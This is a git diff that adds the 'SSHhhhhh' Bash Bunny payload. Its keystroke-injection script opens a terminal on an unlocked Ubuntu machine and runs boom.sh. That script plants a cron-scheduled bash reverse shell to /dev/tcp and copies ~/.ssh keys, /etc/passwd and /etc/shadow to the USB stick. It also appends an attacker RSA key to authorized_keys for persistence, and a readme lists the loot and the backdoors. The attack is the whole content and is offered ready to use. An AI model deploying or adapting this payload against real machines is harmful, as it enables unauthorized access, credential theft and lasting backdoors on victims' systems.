diff --git a/payloads/library/remote_access/SSHhhhhh-(Linux)/boom.sh b/payloads/library/remote_access/SSHhhhhh-(Linux)/boom.sh
new file mode 100644
index 00000000..82643fc0
--- /dev/null
+++ b/payloads/library/remote_access/SSHhhhhh-(Linux)/boom.sh
@@ -0,0 +1,48 @@
+#!/bin/bash
+
+# Main Payload
+
+# Set variables for METERPRETER Reverse_TCP Session, CRON schedule, Attacker's RSA Key, etc..
+RSA_KEY='PLACEHOLDER-FOR-RSA-PUBLIC-KEY' # replace with the contents of ~/.ssh/id_rsa.pub or whatever your RSA public key file is named
+REVERSESHELL=true
+LHOST='10.20.20.104' # Reverse Shell listening host IP
+LPORT='4444' # Reverse Shell listening host port
+CRON='30 */1 * * *' # Just the timing portion of the CRON job
+ATTACKER_HOST='engineering@kali-2' # Tail end of RSA key from above. Do not include spaces
+DT=$(date "+%Y.%m.%d-%H.%M.%S")
+DN=/media/$USER/BashBunny/loot/$USER-$HOSTNAME-$DT
+
+if [ "$REVERSESHELL" = true ] ; then
+ # Create reverse shell script
+ echo "#!/bin/bash"> .config/rs.sh ;
+ echo "bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1">> .config/rs.sh ;
+ chmod +x /home/$USER/.config/rs.sh ;
+
+ # Add task to CRON that launches the Reverse_TCP script on a schedule for persistence
+ crontab -l > crontab.tmp ;
+ if grep -Fq .config/rs.sh crontab.tmp; then
+ echo 'Update in progress.'
+ else
+ echo "$CRON /home/$USER/.config/rs.sh" >> crontab.tmp ;
+ crontab crontab.tmp ;
+ fi
+ rm -f crontab.tmp ;
+fi
+
+# Smash & Grab the loot!! (Get what you can now and work on PrivEsc later)
+mkdir $DN ;
+ip addr > $DN/ip-addr.txt ;
+whoami > $DN/whoami.txt ;
+cat /proc/net/arp > $DN/arp.txt ;
+cat /etc/passwd > $DN/etc-passwd.txt ;
+cat /etc/shadow > $DN/etc-shadow.txt ;
+uname -a > $DN/uname-a.txt ;
+route -n > $DN/route-n.txt ;
+cp /home/$USER/.ssh/* $DN/. ;
+
+# Add Attacker's RSA key to .ssh/authorized_keys for additional persistence
+if grep -Fq $ATTACKER_HOST .ssh/authorized_keys ; then
+ echo 'Update almost completed.'
+else
+ echo $RSA_KEY >> .ssh/authorized_keys ;
+fi
diff --git a/payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt b/payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt
new file mode 100644
index 00000000..1033e110
--- /dev/null
+++ b/payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt
@@ -0,0 +1,54 @@
+# Title: SSHhhhhh
+# Description: Exfiltrates files from user's .ssh folder to Bash Bunny via USB & adds backdoors
+# Author: WWVB
+# Props: Hak5Darren, hak5peaks
+# Version: 1.1
+# Category: Exfiltration w/Persistence
+# Target: Linux Ubuntu 18.04 LTS
+# Attackmodes: HID, Storage
+
+DRIVE_LABEL="BashBunny"
+
+#!/bin/bash
+
+LED SETUP
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+
+LED STAGE1
+QUACK DELAY 500
+QUACK CTRL-ALT t
+QUACK DELAY 100
+
+# Drop primary payload on the box
+QUACK STRING cp /media/\$USER/$DRIVE_LABEL/payloads/$SWITCH_POSITION/boom.sh .
+QUACK ENTER
+QUACK DELAY 50
+
+QUACK STRING chmod +x boom.sh
+QUACK ENTER
+QUACK DELAY 50
+
+LED ATTACK
+
+# Light the fuse and wait!!
+QUACK STRING ./boom.sh
+QUACK ENTER
+QUACK DELAY 1000
+
+# Cleanup
+LED CLEANUP
+QUACK STRING rm boom.sh
+QUACK ENTER
+QUACK DELAY 100
+
+# Bye Felicia!
+QUACK STRING umount '/media/$USER/$DRIVE_LABEL'
+QUACK ENTER
+QUACK DELAY 25
+
+QUACK STRING exit
+QUACK ENTER
+QUACK DELAY 25
+
+LED FINISH
diff --git a/payloads/library/remote_access/SSHhhhhh-(Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh-(Linux)/readme.md
new file mode 100644
index 00000000..8f1064aa
--- /dev/null
+++ b/payloads/library/remote_access/SSHhhhhh-(Linux)/readme.md
@@ -0,0 +1,32 @@
+# SSHhhhhh
+
+## Author: WWVB
+## Version: Version 1.0
+
+## Description
+
+## Target = Unlocked Linux machine (only tested on Ubuntu 18.04 LTS)
+Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [nothing major])
+
+## Loot = Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..)
+ + whoami
+ + ip addr
+ + arp data
+ + route -n
+ + /etc/passwd
+ + /etc/shadow (on the off chance you get a root terminal)
+ + uname -a
+
+## Two opportunites for persistence are injected:
+ + Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You)
+ + Reverse_TCP shell script is dropped in the ~/$USER/.config folder and a CRON job added that calls it on a schedule (aka Call Me Later)
+
+## Configuration = HID STORAGE